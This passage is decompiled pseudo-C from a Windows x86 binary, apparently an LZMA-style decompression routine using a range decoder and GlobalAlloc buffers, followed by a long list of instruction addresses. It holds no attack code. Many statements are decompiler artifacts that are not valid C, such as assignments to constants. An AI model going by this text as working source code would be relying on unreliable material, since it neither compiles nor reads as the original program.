									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x0040604c
0x0040604c
0x00406051
0x004060c8
0x004060cf
0x004060d9
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00000000
0x00406709
0x00406709
0x0040670d
0x004068bc
0x00000000
0x004068bc
0x00406719
0x00406720
0x00406728
0x0040672b
0x00000000
0x0040672b
0x00406053
0x00406053
0x00406057
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406078
0x0040607f
0x00406082
0x0040608d
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x0040609c
0x004060ba
0x004060bc
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062e1
0x004062e4
0x00406287
0x0040628d
0x00000000
0x00000000
0x00000000
0x004062e6
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406284
0x00000000
0x00406284
0x0040609e
0x0040609e
0x004060a1
0x004060a7
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406190
0x00406193
0x0040610a
0x0040610a
0x00406110
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x0040621d
0x00406220
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061c0
0x004061c0
0x00406220
0x00406227
0x00406227
0x00406227
0x0040622b
0x0040622b
0x0040622e
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x004063f7
0x004063f7
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040611c
0x00000000
0x00000000
0x00000000
0x00406199
0x004060e5
0x004060e9
0x00406856
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406107
0x00000000
0x00406107
0x00406193
0x0040609c
0x00405ed0
0x00405ed0
0x00405ed9
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x00000000
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x00000000
0x004066b5
0x00406688
0x0040668b
0x0040668f
0x00406692
